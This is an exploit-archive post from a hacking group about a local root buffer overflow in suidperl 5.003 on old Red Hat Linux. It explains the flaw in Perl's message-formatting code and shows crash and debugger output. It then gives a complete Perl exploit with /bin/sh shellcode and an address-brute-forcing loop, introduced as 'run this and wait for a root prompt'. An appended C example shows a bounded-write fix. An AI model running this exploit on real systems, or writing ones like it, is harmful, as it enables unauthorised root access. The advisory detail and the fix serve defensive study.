Linux perl-5.003-8/-9 Local Buffer Overflow PoC
Posted on 26 June 2010
===============================================
Linux perl-5.003-8/-9 Local Buffer Overflow PoC
===============================================

########################################################################
#!/usr/bin/perl
# Author: Thehacker
# Site: [ [ :GODHACK.ORG : ] ]
# Software Link: http://www.perl.com/download.csp
# Version: perl-5.003-9
# Tested on: Red Hat Linux 4.2 on Intel (with perl-5.003-8 and -9)
# CVE :
# Code :
########################################################################

Any user can gain root privileges on an Intel Linux system with suidperl
5.003 (having the suid bit, of course) even if "SUIDBUF" and the "two
suidperl security patches" have been applied. Non-Intel / non-Linux
platforms may be affected as well. It is still possible to overwrite a
buffer and get root on Linux via sperl 5.003.

########################################################################

I have tested this on two Red Hat 4.2 systems running on Intel (with
perl-5.003-8 and -9). I am pretty sure any Intel-like Linux having
sperl5.003 is affected. Other platforms may be affected too.

Perl 5.004 is NOT VULNERABLE.

########################################################################

Quick fix:

    chmod u-s /usr/bin/sperl5.003

(what else?)

########################################################################

Details:

There is a nasty bug in mess() (util.c): it is possible to overflow its
buffer (via sprintf()); mess() tries to detect this situation but fails
to handle the problem properly:

[excerpt from util.c]

    if (s - s_start >= sizeof(buf)) {   /* Ooops! */
        if (usermess)
            fputs(SvPVX(tmpstr), stderr);
        else
            fputs(buf, stderr);
        fputs("panic: message overflow - memory corrupted!\n", stderr);
        my_exit(1);
    }

It does not abort immediately. It prints out an error message and calls
my_exit(1), and this is very bad: by the time the check runs, sprintf()
has already written past the end of buf.

    $ perl -v

    This is perl, version 5.003 with EMBED
        Locally applied patches:
          SUIDBUF - Buffer overflow fixes for suidperl security
        built under linux at Apr 22 1997 10:04:46
        + two suidperl security patches

    $ perl `perl -e "print 'A' x 3000"`
    Can't open perl script "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...
    ...AAAAAAAAAAAAAAAAA": File name too long
    panic: message overflow - memory corrupted!
    $
    Can't open perl script "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...
    ...AAAAAAAAAAAAAAAAA": File name too long
    panic: message overflow - memory corrupted!
    Segmentation fault (core dumped)

    $ gdb /usr/bin/perl core
    GDB is free software and you are welcome to distribute copies of it
     under certain conditions; type "show copying" to see the conditions.
    There is absolutely no warranty for GDB; type "show warranty" for details.
    GDB 4.16 (i586-unknown-linux), Copyright 1996 Free Software Foundation, Inc...
    (no debugging symbols found)...
    Core was generated by `perl AAAAA...'.
    Program terminated with signal 11, Segmentation fault.
    Reading symbols ...
    ...
    #0  0x41414141 in ?? ()
    (gdb)

Voila! 0x41414141 == "AAAA"

The variable called top_env has been overwritten. In fact, it is a
jmp_buf, and Perl calls longjmp() with it somewhere in my_exit().

##########################################################################

Run this and wait for a root prompt:

[exploit code]

#!/usr/bin/perl
# yes, this suidperl exploit is in perl, isn't it wonderful?

$| = 1;

$shellcode =
    "\x90" x 512 .                              # nops
    "\xbc\xf0\xff\xff\xbf" .                    # movl $0xbffffff0,%esp
    # "standard shellcode" by Aleph One
    "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" .
    "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" .
    "\x80\xe8\xdc\xff\xff\xff/bin/sh";

# start and end of .data
# adjust this using /proc/*/maps
$databot = 0x080a2000;
$datatop = 0x080ab000;

# trial and error loop
$address = $databot + 4;
while ($address < $datatop) {
    $smash_me = $shellcode . ('A' x (2052 - length($shellcode))) .
                (pack("l", $address) x 1000) . ('B' x 1000);
    $pid = fork();
    if (!$pid) {
        exec('/usr/bin/sperl5.003', $smash_me);
    } else {
        wait;
        if ($? == 0) {
            printf("THE MAGIC ADDRESS WAS %08x\n", $address);
            exit;
        }
    }
    $address += 128;
}

[end of exploit code]

########################################################################

-- Thehacker & Bl4ck Hat Team
-- Gretz : TR-shark | KOmandO | SoyletmeZ | HEXB00T3R & iSKORPiTX
-- Tnx all! //r0073r,str0k3,inj3ct0r,exploit-db,GODHACK

We Will Never Stop Hacking
It's not a game, It's Our Job
-----(-GODHACK.ORG-)------

# Inj3ct0r.com [2010-06-26]
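The root cause in the Details section is a size check that runs only after sprintf() has already run past the buffer, followed by a cleanup path (my_exit(), longjmp() through the clobbered top_env) that trusts the corrupted memory. The following C is an added example, not Perl's util.c and not from the advisory: it formats the same "Can't open perl script" message with a bounded write so that "did it fit?" is known before anything is overwritten; MSG_BUF_SIZE, format_open_error and report_open_error are names chosen for this example.

```c
#include <stdio.h>
#include <string.h>

/* Hypothetical size for this example; util.c's exact buffer size is not the point. */
#define MSG_BUF_SIZE 256

/* Bounded replacement for the mess()-style formatting of the
 * "Can't open perl script" message. snprintf() writes at most bufsz
 * bytes and returns the length the whole message needs, so "did it
 * fit?" is known without anything having been overwritten.
 * Returns that needed length (without NUL); >= bufsz means truncated. */
size_t format_open_error(char *buf, size_t bufsz,
                         const char *script, const char *reason)
{
    int n = snprintf(buf, bufsz, "Can't open perl script \"%s\": %s\n",
                     script, reason);
    if (n < 0) {                /* encoding error: leave an empty string */
        if (bufsz > 0)
            buf[0] = '\0';
        return 0;
    }
    return (size_t)n;
}

/* Caller side; returns 1 if the message fit, 0 if it was truncated.
 * Contrast with util.c: its size check runs after sprintf() has already
 * run past the buffer, and the handler then calls my_exit(), which
 * longjmp()s through top_env, a jmp_buf the overflow may just have
 * overwritten. If a check like that ever fires, the only defensible
 * reaction is abort()/_exit(), never a cleanup path that trusts memory
 * you have just found to be corrupted. */
int report_open_error(const char *script, const char *reason)
{
    char buf[MSG_BUF_SIZE];
    size_t need = format_open_error(buf, sizeof buf, script, reason);
    fputs(buf, stderr);         /* always NUL-terminated, never past the end */
    if (need >= sizeof buf) {
        fputs("[message truncated]\n", stderr);
        return 0;
    }
    return 1;
}

int main(void)
{
    char name[3001];            /* constructed: a 3000-byte script name, as in the advisory */
    memset(name, 'A', sizeof name - 1);
    name[sizeof name - 1] = '\0';
    report_open_error(name, "File name too long");
    return 0;
}
```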